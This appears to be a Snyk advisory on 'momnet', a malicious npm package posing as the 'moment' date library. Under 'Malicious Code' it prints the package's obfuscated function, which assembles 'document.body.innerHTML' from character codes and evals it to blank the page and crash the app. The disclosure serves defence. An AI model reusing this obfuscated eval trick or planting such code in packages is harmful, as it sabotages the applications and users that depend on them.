Malicious Package Affecting momnet package, versions *
Threat Intelligence
Exploit Maturity
Mature
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-MOMNET-2324797
- published 23 Dec 2021
- disclosed 15 Dec 2021
- credit Ophir Pickman
How to fix?
Avoid using all malicious instances of the momnet package.
Overview
momnet is a malicious package. The library pretends to be the popular moment library, which is used in generating timestamps in different time-zones and formats for front-end projects.
The malicious package is almost identical to the original library. The only difference is that it employs a different, crafted moment.min.js file of an unknown origin, rather than the library's own source.
Malicious Code
function anonymous() {
var a = 100,
b = 111,
c = 99,
d = 117,
e = 109,
f = 101,
g = 110,
h = 116,
k = 98,
l = 121,
z = 105,
x = 114,
v = 72,
n = 84,
w = 77,
q = 76,
to = (e, t) => e + String.fromCharCode(t),
j = [a, b, c, d, e, f, g, h].reduce(to, ""),
p = [k, b, a, l].reduce(to, ""),
r = [z, g, g, f, x, v, n, w, q].reduce(to, "");
(() => {
eval(`${j}.${p}.${r} = ''`);
})();
}
The malicious method deletes the inner HTML body and as a result, crashes the app.
References
CVSS Scores
version 3.1